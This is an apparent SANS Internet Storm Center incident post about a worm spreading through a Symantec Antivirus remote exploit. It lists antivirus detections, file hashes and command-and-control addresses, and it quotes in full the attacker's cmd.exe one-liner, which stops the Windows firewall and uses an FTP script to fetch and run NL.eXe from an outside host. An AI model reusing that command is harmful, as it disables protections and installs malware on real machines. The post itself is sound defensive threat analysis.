Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: sav worm and its cc - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
sav worm and its cc
Thanks to John for this submission:

This file was being downloaded by a large number of machines that were recently exploited using the SAV remote exploit. The sequence of events for these compromises were:

Exploit comes in from IP address A (this IP varies)
Victim sends a Windows command prompt to 61.172.250.59 on tcp port 12345 61.172.250.59 responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"

Obviously, this command stops the Windows firewall service,
creates an ftp command script named "x" that is then run by ftp.exe -s:x
which downloads NL.eXe (from ftpd.3322.org 21211),
the file is then executed and then the x file is deleted.


Running the file through Virustotal gave limited information.

Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET). 
BitDefender 7.2 12.14.2006 DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan
eSafe 7.0.14.0 12.14.2006 Win32.Polipos.sus
 Fortinet 2.82.0.0 12.14.2006 suspicious
Ikarus T3.1.0.26 12.14.2006 Trojan-Downloader.Win32.Zlob.and
Kaspersky 4.0.2.24 12.14.2006 no virus found
Norman 5.80.02 12.14.2006 W32/Suspicious_U.gen
Panda 9.0.0.4 12.13.2006 Suspicious file
Prevx1 V2 12.14.2006 Malicious
Sophos 4.12.0 12.14.2006 Mal/Behav-009
Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious
 All others reported no virus found!

Aditional Information
File size: 12168 bytes
MD5: f538d2c73c7bc7ad084deb8429bd41ef
SHA1: 0eb52548a1c234cb2f8506a7c9a2e1a4547e9f8d
packers: UPACK
packers: embedded, UPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=70e962776070
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

John, then reviewed his ids logs looking for traffic on the port 5202 which appears to be the command and control port for this malware and discovered traffic towards 61.172.146.94.
 
donald

206 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!